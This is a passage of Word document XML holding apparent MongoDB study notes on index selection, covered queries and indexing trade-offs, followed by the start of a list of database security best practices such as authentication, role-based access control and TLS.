          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Selection and Query Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E84B3"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The query optimizer uses statistics (such as index key distribution and query frequency) to decide which index to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54159B05"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Intersection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: MongoDB can combine multiple single-field indexes to fulfill a query, which can improve performance if a compound index is not available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE90068" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Covered Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C17DB6"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A query is considered "covered" if all the fields in the query (and in the projection) are part of the index. Covered queries only access the index, avoiding a full document fetch, which boosts performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E00601E" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: db.collection.find({ "username": "john_doe" }, { "username": 1, "_id": 0 }) would be covered if there’s an index on username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F745728" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Indexing in MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4087D4" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Improved Query Speed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA791E0" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes significantly reduce the time it takes to execute queries by limiting the number of documents MongoDB needs to scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94319E" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Efficient Sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72403BF5" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes allow MongoDB to sort documents efficiently by using the index keys, avoiding the need for in-memory sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254923BC" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduced I/O Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECB559" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Since indexes are smaller than the actual data, MongoDB can store and retrieve them from memory more efficiently, reducing disk I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5C6D5" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Support for Complex Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD9DFBB" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compound and multikey indexes enable MongoDB to handle complex queries that involve multiple fields or arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468C734" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Trade-offs and Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEC732" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C9092" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each index requires additional storage and increases the complexity of write operations (inserts, updates, deletes) since the index must be maintained alongside the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E30ED9" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Degradation with Excessive Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD848F" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Too many indexes can degrade write performance and increase storage requirements. It's important to only create indexes that are necessary for query optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9320BD" w14:textId="77777777" w:rsidR="00180100" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexing Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D42CC86" w14:textId="27AF0011" w:rsidR="00ED3968" w:rsidRPr="00DA2F32" w:rsidRDefault="00180100" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Careful planning is required to create the right indexes based on query patterns. Analyzing query performance using tools like explain() can help optimize index usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8E59F" w14:textId="01E17CD6" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc178383328"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Describe best practices for securing and managing data in MongoDB.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="6DD4164D" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Securing and managing data in MongoDB is critical for protecting sensitive information and ensuring data integrity. Here are some best practices to help secure and manage data effectively in MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6881CD"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1. Authentication and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048A329" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that MongoDB authentication is enabled to require credentials for accessing the database. This prevents unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA84852" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example: Use SCRAM (Salted Challenge Response Authentication Mechanism) for secure password-based authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB1EE6" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement RBAC to assign roles with specific permissions to users. Only grant users the minimum required privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D1E5E" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Create different roles for administrators, application users, and read-only users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052DA8F" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Strong Passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enforce strong password policies for all database users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159774B2"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2. Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6494D9" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable TLS/SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use TLS/SSL encryption to secure data in transit between clients and MongoDB servers. This protects against eavesdropping and man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF2DEA" w14:textId="77777777" w:rsidR="00714C5A" w:rsidRPr="00DA2F32" w:rsidRDefault="00714C5A" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
